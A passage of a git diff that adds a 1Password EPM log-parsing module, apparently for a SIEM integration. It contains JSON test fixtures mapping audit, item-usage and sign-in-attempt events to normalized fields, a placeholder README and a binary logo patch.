{\"uuid\": \"A5K6COGVRVEJXJW3XQZGS7VAMM\", \"login_time\": \"2023-03-15T16:33:50-03:00\", \"device_uuid\": \"lc5fqgbrcm4plajd8mwncv2b3u\", \"ip\": \"1.2.3.4\"}, \"location\": {\"country\": \"Canada\", \"region\": \"Ontario\", \"city\": \"Toronto\", \"latitude\": 43.5991, \"longitude\": -79.4988}}"
+  },
+  "expected": {
+    "message": "{\"sekoia_event_type\": \"auditevents\", \"uuid\": \"56YE2TYN2VFYRLNSHKPW5NVT5E\", \"timestamp\": \"2023-03-15T16:33:50-03:00\", \"actor_uuid\": \"4HCGRGYCTRQFBMGVEGTABYDU2V\", \"actor_details\": {\"uuid\": \"4HCGRGYCTRQFBMGVEGTABYDU2V\", \"name\": \"Jane Doe\", \"email\": \"jane.doe@example.com\"}, \"action\": \"join\", \"object_type\": \"gm\", \"object_uuid\": \"pf8soyakgngrphytsyjed4ae3u\", \"aux_id\": 9277034, \"aux_uuid\": \"K6VFYDCJKHGGDI7QFAXX65LCDY\", \"aux_details\": {\"uuid\": \"K6VFYDCJKHGGDI7QFAXX65LCDY\", \"name\": \"John Doe\", \"email\": \"john.doe@example.com\"}, \"aux_info\": \"R\", \"session\": {\"uuid\": \"A5K6COGVRVEJXJW3XQZGS7VAMM\", \"login_time\": \"2023-03-15T16:33:50-03:00\", \"device_uuid\": \"lc5fqgbrcm4plajd8mwncv2b3u\", \"ip\": \"1.2.3.4\"}, \"location\": {\"country\": \"Canada\", \"region\": \"Ontario\", \"city\": \"Toronto\", \"latitude\": 43.5991, \"longitude\": -79.4988}}",
+    "event": {
+      "action": "join",
+      "category": [
+        "configuration"
+      ],
+      "dataset": "auditevents",
+      "outcome": "failure",
+      "type": [
+        "change"
+      ]
+    },
+    "1password": {
+      "object": {
+        "type": "gm",
+        "uuid": "pf8soyakgngrphytsyjed4ae3u"
+      },
+      "session_uuid": "A5K6COGVRVEJXJW3XQZGS7VAMM"
+    },
+    "@timestamp": "2023-03-15T19:33:50Z",
+    "client": {
+      "address": "1.2.3.4",
+      "geo": {
+        "city_name": "Toronto",
+        "country_name": "Canada",
+        "location": {
+          "lat": 43.5991,
+          "lon": -79.4988
+        },
+        "region_name": "Ontario"
+      },
+      "ip": "1.2.3.4"
+    },
+    "host": {
+      "id": "lc5fqgbrcm4plajd8mwncv2b3u"
+    },
+    "observer": {
+      "product": "1Password EPM",
+      "vendor": "Agilebits"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "Jane Doe"
+      ]
+    },
+    "user": {
+      "email": "jane.doe@example.com",
+      "id": "4HCGRGYCTRQFBMGVEGTABYDU2V",
+      "name": "Jane Doe",
+      "target": {
+        "email": "john.doe@example.com",
+        "id": "K6VFYDCJKHGGDI7QFAXX65LCDY",
+        "name": "John Doe"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/1Password/1password-epm/tests/test_item_usage_events.json b/1Password/1password-epm/tests/test_item_usage_events.json
new file mode 100644
index 000000000..17104ecd9
--- /dev/null
+++ b/1Password/1password-epm/tests/test_item_usage_events.json
@@ -0,0 +1,60 @@
+{
+  "input": {
+    "message": "{\"sekoia_event_type\": \"itemusages\", \"uuid\": \"56YE2TYN2VFYRLNSHKPW5NVT5E\", \"timestamp\": \"2023-03-15T16:33:50-03:00\", \"used_version\": 0, \"vault_uuid\": \"VZSYVT2LGHTBWBQGUJAIZVRABM\", \"item_uuid\": \"SDGD3I4AJYO6RMHRK8DYVNFIDZ\", \"user\": {\"uuid\": \"4HCGRGYCTRQFBMGVEGTABYDU2V\", \"name\": \"John Doe\", \"email\": \"john.doe@example.com\"}, \"client\": {\"app_name\": \"1Password Browser\", \"app_version\": \"20240\", \"platform_name\": \"Chrome\", \"platform_version\": \"string\", \"os_name\": \"MacOSX\", \"os_version\": \"13.2\", \"ip_address\": \"1.2.3.4\"}, \"location\": {\"country\": \"Canada\", \"region\": \"Ontario\", \"city\": \"Toronto\", \"latitude\": 43.5991, \"longitude\": -79.4988}, \"action\": \"secure-copy\"}"
+  },
+  "expected": {
+    "message": "{\"sekoia_event_type\": \"itemusages\", \"uuid\": \"56YE2TYN2VFYRLNSHKPW5NVT5E\", \"timestamp\": \"2023-03-15T16:33:50-03:00\", \"used_version\": 0, \"vault_uuid\": \"VZSYVT2LGHTBWBQGUJAIZVRABM\", \"item_uuid\": \"SDGD3I4AJYO6RMHRK8DYVNFIDZ\", \"user\": {\"uuid\": \"4HCGRGYCTRQFBMGVEGTABYDU2V\", \"name\": \"John Doe\", \"email\": \"john.doe@example.com\"}, \"client\": {\"app_name\": \"1Password Browser\", \"app_version\": \"20240\", \"platform_name\": \"Chrome\", \"platform_version\": \"string\", \"os_name\": \"MacOSX\", \"os_version\": \"13.2\", \"ip_address\": \"1.2.3.4\"}, \"location\": {\"country\": \"Canada\", \"region\": \"Ontario\", \"city\": \"Toronto\", \"latitude\": 43.5991, \"longitude\": -79.4988}, \"action\": \"secure-copy\"}",
+    "event": {
+      "action": "secure-copy",
+      "category": [
+        "session"
+      ],
+      "dataset": "itemusages",
+      "outcome": "failure",
+      "type": [
+        "info"
+      ]
+    },
+    "1password": {
+      "item_uuid": "SDGD3I4AJYO6RMHRK8DYVNFIDZ",
+      "vault_uuid": "VZSYVT2LGHTBWBQGUJAIZVRABM"
+    },
+    "@timestamp": "2023-03-15T19:33:50Z",
+    "client": {
+      "address": "1.2.3.4",
+      "geo": {
+        "city_name": "Toronto",
+        "country_name": "Canada",
+        "location": {
+          "lat": 43.5991,
+          "lon": -79.4988
+        },
+        "region_name": "Ontario"
+      },
+      "ip": "1.2.3.4"
+    },
+    "host": {
+      "os": {
+        "name": "MacOSX",
+        "version": "13.2"
+      }
+    },
+    "observer": {
+      "product": "1Password EPM",
+      "vendor": "Agilebits"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "John Doe"
+      ]
+    },
+    "user": {
+      "email": "john.doe@example.com",
+      "id": "4HCGRGYCTRQFBMGVEGTABYDU2V",
+      "name": "John Doe"
+    }
+  }
+}
\ No newline at end of file
diff --git a/1Password/1password-epm/tests/test_sign_in_attempts.json b/1Password/1password-epm/tests/test_sign_in_attempts.json
new file mode 100644
index 000000000..18313edeb
--- /dev/null
+++ b/1Password/1password-epm/tests/test_sign_in_attempts.json
@@ -0,0 +1,59 @@
+{
+  "input": {
+    "message": "{\"sekoia_event_type\": \"signinattempts\", \"uuid\": \"56YE2TYN2VFYRLNSHKPW5NVT5E\", \"session_uuid\": \"A5K6COGVRVEJXJW3XQZGS7VAMM\", \"timestamp\": \"2023-03-15T16:32:50-03:00\", \"category\": \"firewall_failed\", \"type\": \"continent_blocked\", \"country\": \"France\", \"details\": {\"value\": \"Europe\"}, \"target_user\": {\"uuid\": \"IR7VJHJ36JHINBFAD7V2T5MP3E\", \"name\": \"John Doe\", \"email\": \"john.doe@example.com\"}, \"client\": {\"app_name\": \"1Password Browser\", \"app_version\": \"20240\", \"platform_name\": \"Chrome\", \"platform_version\": \"string\", \"os_name\": \"MacOSX\", \"os_version\": \"13.2\", \"ip_address\": \"1.2.3.4\"}, \"location\": {\"country\": \"Canada\", \"region\": \"Ontario\", \"city\": \"Toronto\", \"latitude\": 43.5991, \"longitude\": -79.4988}}"
+  },
+  "expected": {
+    "message": "{\"sekoia_event_type\": \"signinattempts\", \"uuid\": \"56YE2TYN2VFYRLNSHKPW5NVT5E\", \"session_uuid\": \"A5K6COGVRVEJXJW3XQZGS7VAMM\", \"timestamp\": \"2023-03-15T16:32:50-03:00\", \"category\": \"firewall_failed\", \"type\": \"continent_blocked\", \"country\": \"France\", \"details\": {\"value\": \"Europe\"}, \"target_user\": {\"uuid\": \"IR7VJHJ36JHINBFAD7V2T5MP3E\", \"name\": \"John Doe\", \"email\": \"john.doe@example.com\"}, \"client\": {\"app_name\": \"1Password Browser\", \"app_version\": \"20240\", \"platform_name\": \"Chrome\", \"platform_version\": \"string\", \"os_name\": \"MacOSX\", \"os_version\": \"13.2\", \"ip_address\": \"1.2.3.4\"}, \"location\": {\"country\": \"Canada\", \"region\": \"Ontario\", \"city\": \"Toronto\", \"latitude\": 43.5991, \"longitude\": -79.4988}}",
+    "event": {
+      "category": [
+        "authentication"
+      ],
+      "dataset": "signinattempts",
+      "outcome": "failure",
+      "type": [
+        "start"
+      ]
+    },
+    "1password": {
+      "category": "firewall_failed",
+      "session_uuid": "A5K6COGVRVEJXJW3XQZGS7VAMM",
+      "type": "continent_blocked"
+    },
+    "@timestamp": "2023-03-15T19:32:50Z",
+    "client": {
+      "address": "1.2.3.4",
+      "geo": {
+        "city_name": "Toronto",
+        "country_name": "Canada",
+        "location": {
+          "lat": 43.5991,
+          "lon": -79.4988
+        },
+        "region_name": "Ontario"
+      },
+      "ip": "1.2.3.4"
+    },
+    "host": {
+      "os": {
+        "name": "MacOSX",
+        "version": "13.2"
+      }
+    },
+    "observer": {
+      "product": "1Password EPM",
+      "vendor": "Agilebits"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ]
+    },
+    "user": {
+      "target": {
+        "email": "john.doe@example.com",
+        "id": "IR7VJHJ36JHINBFAD7V2T5MP3E",
+        "name": "John Doe"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/1Password/README.md b/1Password/README.md
new file mode 100644
index 000000000..fe3c4f805
--- /dev/null
+++ b/1Password/README.md
@@ -0,0 +1,7 @@
+# 1Password
+
+## Description
+The description of the module
+
+## Intakes
+*
diff --git a/1Password/_meta/logo.png b/1Password/_meta/logo.png
new file mode 100644
index 0000000000000000000000000000000000000000..d8fbd396e5dd798f4530be439b902acae10c5f19
GIT binary patch
literal 11824
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
